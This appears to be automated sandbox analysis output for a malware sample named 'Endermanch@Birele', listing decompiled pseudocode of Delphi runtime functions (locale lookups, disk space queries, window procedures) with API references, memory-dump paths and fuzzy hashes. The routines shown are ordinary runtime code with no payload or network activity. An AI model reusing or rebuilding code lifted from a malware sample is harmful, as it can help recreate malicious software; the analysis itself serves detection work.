                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404947
                                                                                                                                                  0x0040494a
                                                                                                                                                  0x00404951
                                                                                                                                                  0x00404955
                                                                                                                                                  0x00404956
                                                                                                                                                  0x00404956
                                                                                                                                                  0x00404945
                                                                                                                                                  0x0040492f
                                                                                                                                                  0x00404a82
                                                                                                                                                  0x00404a8b

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404915
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00404926
                                                                                                                                                  • lstrcpyn.KERNEL32(?,?,?), ref: 00404956
                                                                                                                                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll), ref: 004049BA
                                                                                                                                                  • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll), ref: 004049EF
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00404A02
                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00404A0F
                                                                                                                                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00404A1B
                                                                                                                                                  • lstrcpyn.KERNEL32(0000005D,?,00000104), ref: 00404A4F
                                                                                                                                                  • lstrlen.KERNEL32(?,0000005D,?,00000104), ref: 00404A5B
                                                                                                                                                  • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104), ref: 00404A7D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                                                                  • Opcode ID: 51cc53dd29fc10e980978c6e8c5ef7c5ec2b63acdc9323cba57404894a6f7bcd
                                                                                                                                                  • Instruction ID: 7c871d1f50c99334550fd3d29ee73b611cb0501c60b53655845a1ea95b6ba134
                                                                                                                                                  • Opcode Fuzzy Hash: 51cc53dd29fc10e980978c6e8c5ef7c5ec2b63acdc9323cba57404894a6f7bcd
                                                                                                                                                  • Instruction Fuzzy Hash: C84166B2E00159ABDB11DAA9CC85BDF77ACDF84314F1401FBAA48F7281D6389F408B58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405435(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                                                                                                                                  				long _t11;
                                                                                                                                                  				void* _t16;
                                                                                                                                                  
                                                                                                                                                  				_t16 = __ebx;
                                                                                                                                                  				 *__edi =  *__edi + __ecx;
                                                                                                                                                  				 *((intOrPtr*)(__eax - 0x4195b4)) =  *((intOrPtr*)(__eax - 0x4195b4)) + __eax - 0x4195b4;
                                                                                                                                                  				 *0x41800c = 2;
                                                                                                                                                  				 *0x419014 = 0x401168;
                                                                                                                                                  				 *0x419018 = 0x401170;
                                                                                                                                                  				 *0x419046 = 2;
                                                                                                                                                  				 *0x419000 = E004045F4;
                                                                                                                                                  				if(E00402D68() != 0) {
                                                                                                                                                  					_t3 = E00402D98();
                                                                                                                                                  				}
                                                                                                                                                  				E00402E5C(_t3);
                                                                                                                                                  				 *0x41904c = 0xd7b0;
                                                                                                                                                  				 *0x419218 = 0xd7b0;
                                                                                                                                                  				 *0x4193e4 = 0xd7b0;
                                                                                                                                                  				 *0x41903c = GetCommandLineA();
                                                                                                                                                  				 *0x419038 = E00401288();
                                                                                                                                                  				if((GetVersion() & 0x80000000) == 0x80000000) {
                                                                                                                                                  					 *0x4195b8 = E0040536C(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                  				} else {
                                                                                                                                                  					if((GetVersion() & 0x000000ff) <= 4) {
                                                                                                                                                  						 *0x4195b8 = E0040536C(GetThreadLocale(), _t16, __eflags);
                                                                                                                                                  					} else {
                                                                                                                                                  						 *0x4195b8 = 3;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t11 = GetCurrentThreadId();
                                                                                                                                                  				 *0x419030 = _t11;
                                                                                                                                                  				return _t11;
                                                                                                                                                  			}





                                                                                                                                                  0x00405435
                                                                                                                                                  0x0040543a
                                                                                                                                                  0x0040543f
                                                                                                                                                  0x00405441
                                                                                                                                                  0x00405448
                                                                                                                                                  0x00405452
                                                                                                                                                  0x0040545c
                                                                                                                                                  0x00405463
                                                                                                                                                  0x00405474
                                                                                                                                                  0x00405476
                                                                                                                                                  0x00405476
                                                                                                                                                  0x0040547b
                                                                                                                                                  0x00405480
                                                                                                                                                  0x00405489
                                                                                                                                                  0x00405492
                                                                                                                                                  0x004054a0
                                                                                                                                                  0x004054aa
                                                                                                                                                  0x004054be
                                                                                                                                                  0x004054f7
                                                                                                                                                  0x004054c0
                                                                                                                                                  0x004054ce
                                                                                                                                                  0x004054e6
                                                                                                                                                  0x004054d0
                                                                                                                                                  0x004054d0
                                                                                                                                                  0x004054d0
                                                                                                                                                  0x004054ce
                                                                                                                                                  0x004054fc
                                                                                                                                                  0x00405501
                                                                                                                                                  0x00405506

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00402D68: GetKeyboardType.USER32(00000000), ref: 00402D6D
                                                                                                                                                    • Part of subcall function 00402D68: GetKeyboardType.USER32(00000001), ref: 00402D79
                                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0040549B
                                                                                                                                                  • GetVersion.KERNEL32 ref: 004054AF
                                                                                                                                                  • GetVersion.KERNEL32 ref: 004054C0
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004054FC
                                                                                                                                                    • Part of subcall function 00402D98: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402DBA
                                                                                                                                                    • Part of subcall function 00402D98: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402E09,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402DED
                                                                                                                                                    • Part of subcall function 00402D98: RegCloseKey.ADVAPI32(?,00402E10,00000000,?,00000004,00000000,00402E09,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402E03
                                                                                                                                                  • GetThreadLocale.KERNEL32 ref: 004054DC
                                                                                                                                                    • Part of subcall function 0040536C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004053D2), ref: 00405392
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                                                                                                  • String ID: 04c
                                                                                                                                                  • API String ID: 3734044017-3032219543
                                                                                                                                                  • Opcode ID: 30dbc7de0d53211cd3278350da8c956f3bbca0a2c0d773b3d694e31fe2b0271e
                                                                                                                                                  • Instruction ID: e6f4b8ea23552cf43e9109a140cdc7762c01cbdf17e763038c1a1c6d8689ef86
                                                                                                                                                  • Opcode Fuzzy Hash: 30dbc7de0d53211cd3278350da8c956f3bbca0a2c0d773b3d694e31fe2b0271e
                                                                                                                                                  • Instruction Fuzzy Hash: 47015EB180430199D710BFB299A53C93EA1AB09348F14C47FE540BA2F2DB7C0E849B6F
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                  			E00405E18(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				struct HWND__* _v32;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  				intOrPtr* _t20;
                                                                                                                                                  				long _t25;
                                                                                                                                                  				long _t26;
                                                                                                                                                  				struct HWND__* _t29;
                                                                                                                                                  				intOrPtr _t34;
                                                                                                                                                  				long _t35;
                                                                                                                                                  
                                                                                                                                                  				_t34 = _a8;
                                                                                                                                                  				_t29 = _a4;
                                                                                                                                                  				_v32 = _t29;
                                                                                                                                                  				_v28 = _t34;
                                                                                                                                                  				_v24 = _a12;
                                                                                                                                                  				_v20 = _a16;
                                                                                                                                                  				_t35 = 0;
                                                                                                                                                  				if(_t29 != 0) {
                                                                                                                                                  					if( *0x4198b8 == 0) {
                                                                                                                                                  						_t35 = GetWindowLongA(_t29, 0xffffffeb);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t35 =  *0x4198b8; // 0x0
                                                                                                                                                  						_t25 =  *0x4198b8; // 0x0
                                                                                                                                                  						 *(_t25 + 0x1c) = _t29;
                                                                                                                                                  						_t26 =  *0x4198b8; // 0x0
                                                                                                                                                  						SetWindowLongA(_t29, 0xffffffeb, _t26);
                                                                                                                                                  						 *0x4198b8 = 0;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_t35 == 0) {
                                                                                                                                                  					if( *0x4198a8 == 0) {
                                                                                                                                                  						_push(_a16);
                                                                                                                                                  						_t19 = _a12;
                                                                                                                                                  						_push(_t19);
                                                                                                                                                  						_push(_t34);
                                                                                                                                                  						_push(_t29);
                                                                                                                                                  						L00405B4C();
                                                                                                                                                  						return _t19;
                                                                                                                                                  					}
                                                                                                                                                  					_t20 =  *0x4198a8; // 0x2170a88
                                                                                                                                                  					return  *((intOrPtr*)( *_t20 + 0x14))();
                                                                                                                                                  				} else {
                                                                                                                                                  					return  *((intOrPtr*)( *_t35 + 0x14))();
                                                                                                                                                  				}
                                                                                                                                                  			}














                                                                                                                                                  0x00405e21
                                                                                                                                                  0x00405e24
                                                                                                                                                  0x00405e27
                                                                                                                                                  0x00405e2a
                                                                                                                                                  0x00405e30
                                                                                                                                                  0x00405e36
                                                                                                                                                  0x00405e39
                                                                                                                                                  0x00405e3d
                                                                                                                                                  0x00405e46
                                                                                                                                                  0x00405e75
                                                                                                                                                  0x00405e48
                                                                                                                                                  0x00405e48
                                                                                                                                                  0x00405e4e
                                                                                                                                                  0x00405e53
                                                                                                                                                  0x00405e56
                                                                                                                                                  0x00405e5f
                                                                                                                                                  0x00405e66
                                                                                                                                                  0x00405e66
                                                                                                                                                  0x00405e46
                                                                                                                                                  0x00405e79
                                                                                                                                                  0x00405e8e
                                                                                                                                                  0x00405ea2
                                                                                                                                                  0x00405ea3
                                                                                                                                                  0x00405ea6
                                                                                                                                                  0x00405ea7
                                                                                                                                                  0x00405ea8
                                                                                                                                                  0x00405ea9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405ea9
                                                                                                                                                  0x00405e93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e7b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405e82

                                                                                                                                                  APIs
                                                                                                                                                  • SetWindowLongA.USER32(?,000000EB,00000000), ref: 00405E5F
                                                                                                                                                  • GetWindowLongA.USER32(?,000000EB), ref: 00405E70
                                                                                                                                                  • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00405EA9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Long$NtdllProc_
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3674618424-0
                                                                                                                                                  • Opcode ID: b42eebfffb6e20d70fd9a83d10bc150c47e558780fdbeb76c2f0d94f498b7c3b
                                                                                                                                                  • Instruction ID: dc2942c20767724d99ff90191b4740557241c23ab1819c43c1dfcbe988e2a9eb
                                                                                                                                                  • Opcode Fuzzy Hash: b42eebfffb6e20d70fd9a83d10bc150c47e558780fdbeb76c2f0d94f498b7c3b
                                                                                                                                                  • Instruction Fuzzy Hash: 96113A719106099FCB10DF59D890DEBB7F8EB49310F14453AE816A73A1D734AE41CFAA
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 46%
                                                                                                                                                  			E0040D970(int __eax, void* __ebx, void* __eflags) {
                                                                                                                                                  				char _v11;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  				void* _t33;
                                                                                                                                                  
                                                                                                                                                  				_t33 = __eflags;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_push(_t31);
                                                                                                                                                  				_push(0x40d9d4);
                                                                                                                                                  				_push( *[fs:edx]);
                                                                                                                                                  				 *[fs:edx] = _t31 + 0xfffffff4;
                                                                                                                                                  				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
                                                                                                                                                  				E00403C1C( &_v16, 7,  &_v11);
                                                                                                                                                  				_push(_v16);
                                                                                                                                                  				E00409A90(7, GetACP(), _t33);
                                                                                                                                                  				_pop(_t28);
                                                                                                                                                  				 *[fs:eax] = _t28;
                                                                                                                                                  				_push(E0040D9DB);
                                                                                                                                                  				return E004039AC( &_v16);
                                                                                                                                                  			}








                                                                                                                                                  0x0040d970
                                                                                                                                                  0x0040d979
                                                                                                                                                  0x0040d97e
                                                                                                                                                  0x0040d97f
                                                                                                                                                  0x0040d984
                                                                                                                                                  0x0040d987
                                                                                                                                                  0x0040d996
                                                                                                                                                  0x0040d9a6
                                                                                                                                                  0x0040d9ae
                                                                                                                                                  0x0040d9b7
                                                                                                                                                  0x0040d9c0
                                                                                                                                                  0x0040d9c3
                                                                                                                                                  0x0040d9c6
                                                                                                                                                  0x0040d9d3

                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040D9D4), ref: 0040D996
                                                                                                                                                  • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040D9D4), ref: 0040D9AF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: 011056b1ef29244b933e296bdf217f967ef22e169aa41a9c2c1fe912db5155c7
                                                                                                                                                  • Instruction ID: 2aa0a149cccc3bdad8f1107e872499380b71667bab33c2c34ff897829838605f
                                                                                                                                                  • Opcode Fuzzy Hash: 011056b1ef29244b933e296bdf217f967ef22e169aa41a9c2c1fe912db5155c7
                                                                                                                                                  • Instruction Fuzzy Hash: FDF09671E04608ABE700EEE2D85299EB7AEE7C5718F50C57AB110E75C1DA7C66048A58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00409E5A(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				long _v16;
                                                                                                                                                  				long _v20;
                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				CHAR* _t25;
                                                                                                                                                  				int _t26;
                                                                                                                                                  				intOrPtr _t31;
                                                                                                                                                  				intOrPtr _t34;
                                                                                                                                                  				intOrPtr* _t39;
                                                                                                                                                  				intOrPtr* _t40;
                                                                                                                                                  				intOrPtr _t48;
                                                                                                                                                  				intOrPtr _t50;
                                                                                                                                                  
                                                                                                                                                  				_t25 = _a4;
                                                                                                                                                  				if(_t25 == 0) {
                                                                                                                                                  					_t25 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                                                                                                  				_v28 = _v8 * _v12;
                                                                                                                                                  				_v24 = 0;
                                                                                                                                                  				_t48 = _v24;
                                                                                                                                                  				_t31 = E004045FC(_v28, _t48, _v16, 0);
                                                                                                                                                  				_t39 = _a8;
                                                                                                                                                  				 *_t39 = _t31;
                                                                                                                                                  				 *((intOrPtr*)(_t39 + 4)) = _t48;
                                                                                                                                                  				_t50 = _v24;
                                                                                                                                                  				_t34 = E004045FC(_v28, _t50, _v20, 0);
                                                                                                                                                  				_t40 = _a12;
                                                                                                                                                  				 *_t40 = _t34;
                                                                                                                                                  				 *((intOrPtr*)(_t40 + 4)) = _t50;
                                                                                                                                                  				return _t26;
                                                                                                                                                  			}

















                                                                                                                                                  0x00409e63
                                                                                                                                                  0x00409e68
                                                                                                                                                  0x00409e6a
                                                                                                                                                  0x00409e6a
                                                                                                                                                  0x00409e7d
                                                                                                                                                  0x00409e8c
                                                                                                                                                  0x00409e8f
                                                                                                                                                  0x00409e9c
                                                                                                                                                  0x00409e9f
                                                                                                                                                  0x00409ea4
                                                                                                                                                  0x00409ea7
                                                                                                                                                  0x00409ea9
                                                                                                                                                  0x00409eb6
                                                                                                                                                  0x00409eb9
                                                                                                                                                  0x00409ebe
                                                                                                                                                  0x00409ec1
                                                                                                                                                  0x00409ec3
                                                                                                                                                  0x00409ecc

                                                                                                                                                  APIs
                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00409E7D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1705453755-0
                                                                                                                                                  • Opcode ID: 394a4979b3ee39f50612be3c2d875f0b1d51c423b50915be9fda06e610967514
                                                                                                                                                  • Instruction ID: 353cd057e2d2ccc385b541749b598d3fb8b705a70165d26d7a4126dbf399a9ae
                                                                                                                                                  • Opcode Fuzzy Hash: 394a4979b3ee39f50612be3c2d875f0b1d51c423b50915be9fda06e610967514
                                                                                                                                                  • Instruction Fuzzy Hash: 7511C0B5A00209AFDB04CFA9CD819AFB7F9FFC8704B14C569A505E7255E6319E018BA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E0040536A(int __eax, void* __ebx, void* __eflags) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v15;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                  				void* _t32;
                                                                                                                                                  
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_push(_t32);
                                                                                                                                                  				_push(0x4053d2);
                                                                                                                                                  				_push( *[fs:edx]);
                                                                                                                                                  				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                                                                  				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                                                                  				E00403C1C( &_v20, 7,  &_v15);
                                                                                                                                                  				E0040292C(_v20,  &_v8);
                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t29);
                                                                                                                                                  				 *[fs:eax] = _t29;
                                                                                                                                                  				_push(E004053D9);
                                                                                                                                                  				return E004039AC( &_v20);
                                                                                                                                                  			}








                                                                                                                                                  0x00405375
                                                                                                                                                  0x0040537a
                                                                                                                                                  0x0040537b
                                                                                                                                                  0x00405380
                                                                                                                                                  0x00405383
                                                                                                                                                  0x00405392
                                                                                                                                                  0x004053a2
                                                                                                                                                  0x004053ad
                                                                                                                                                  0x004053b8
                                                                                                                                                  0x004053b8
                                                                                                                                                  0x004053be
                                                                                                                                                  0x004053c1
                                                                                                                                                  0x004053c4
                                                                                                                                                  0x004053d1

                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004053D2), ref: 00405392
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: 25750694d5593128750b1eebfc99ba24c29a82bccd3446e8a8c1d8fec2b0ca22
                                                                                                                                                  • Instruction ID: 0be0a7911bf5b0446cdb2ce032f664466e42649fafd2f588c617f3da133872ab
                                                                                                                                                  • Opcode Fuzzy Hash: 25750694d5593128750b1eebfc99ba24c29a82bccd3446e8a8c1d8fec2b0ca22
                                                                                                                                                  • Instruction Fuzzy Hash: 68F0C831A04709AFE715DEA1CC41AAFB3BAF784714F50853AB610F75C0E7F86A04CA58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E0040536C(int __eax, void* __ebx, void* __eflags) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v15;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                  				void* _t32;
                                                                                                                                                  
                                                                                                                                                  				_v20 = 0;
                                                                                                                                                  				_push(_t32);
                                                                                                                                                  				_push(0x4053d2);
                                                                                                                                                  				_push( *[fs:edx]);
                                                                                                                                                  				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                                                                  				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                                                                  				E00403C1C( &_v20, 7,  &_v15);
                                                                                                                                                  				E0040292C(_v20,  &_v8);
                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t29);
                                                                                                                                                  				 *[fs:eax] = _t29;
                                                                                                                                                  				_push(E004053D9);
                                                                                                                                                  				return E004039AC( &_v20);
                                                                                                                                                  			}








                                                                                                                                                  0x00405375
                                                                                                                                                  0x0040537a
                                                                                                                                                  0x0040537b
                                                                                                                                                  0x00405380
                                                                                                                                                  0x00405383
                                                                                                                                                  0x00405392
                                                                                                                                                  0x004053a2
                                                                                                                                                  0x004053ad
                                                                                                                                                  0x004053b8
                                                                                                                                                  0x004053b8
                                                                                                                                                  0x004053be
                                                                                                                                                  0x004053c1
                                                                                                                                                  0x004053c4
                                                                                                                                                  0x004053d1

                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004053D2), ref: 00405392
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: c8828c61744f429c8b2be1a0e7de400017bd723991f45ebc2beacf15804416dd
                                                                                                                                                  • Instruction ID: bbf7e57d19a665a2ead527aeb7a48f0986b69c40f5de68d8c1f48b0b2d2594e4
                                                                                                                                                  • Opcode Fuzzy Hash: c8828c61744f429c8b2be1a0e7de400017bd723991f45ebc2beacf15804416dd
                                                                                                                                                  • Instruction Fuzzy Hash: 4EF0C831A04709AFE715DEA1CC41AAFB37AF784714F50853AB610B75C0E7F82A04CA58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040C51C(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                                                                                                                                                  				char _v260;
                                                                                                                                                  				intOrPtr _t10;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  
                                                                                                                                                  				_t18 = __ecx;
                                                                                                                                                  				_t10 = _a4;
                                                                                                                                                  				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                                                                                                                                                  					return E00403A00(_t10, _t18);
                                                                                                                                                  				}
                                                                                                                                                  				return E00403A9C(_t10, _t5 - 1,  &_v260);
                                                                                                                                                  			}






                                                                                                                                                  0x0040c527
                                                                                                                                                  0x0040c529
                                                                                                                                                  0x0040c541
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c559
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C53A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: 403862077fdab618eabd83d9d598232319b368ff89b0beec69ed99e6c8cbbc2f
                                                                                                                                                  • Instruction ID: 629025c6126e800fe5dd8d644b77647399d5d3ed201a2754f2a82a1c5cf6e0b2
                                                                                                                                                  • Opcode Fuzzy Hash: 403862077fdab618eabd83d9d598232319b368ff89b0beec69ed99e6c8cbbc2f
                                                                                                                                                  • Instruction Fuzzy Hash: 42E0923170021867D310AA694C86AE6725C9758310F4042BFB949E73C1EDB8EE4046ED
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E0040C568(int __eax, char __ecx, int __edx) {
                                                                                                                                                  				char _v16;
                                                                                                                                                  				char _t5;
                                                                                                                                                  				char _t6;
                                                                                                                                                  
                                                                                                                                                  				_push(__ecx);
                                                                                                                                                  				_t6 = __ecx;
                                                                                                                                                  				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                                                                                                                                                  					_t5 = _t6;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t5 = _v16;
                                                                                                                                                  				}
                                                                                                                                                  				return _t5;
                                                                                                                                                  			}






                                                                                                                                                  0x0040c56b
                                                                                                                                                  0x0040c56c
                                                                                                                                                  0x0040c582
                                                                                                                                                  0x0040c589
                                                                                                                                                  0x0040c584
                                                                                                                                                  0x0040c584
                                                                                                                                                  0x0040c584
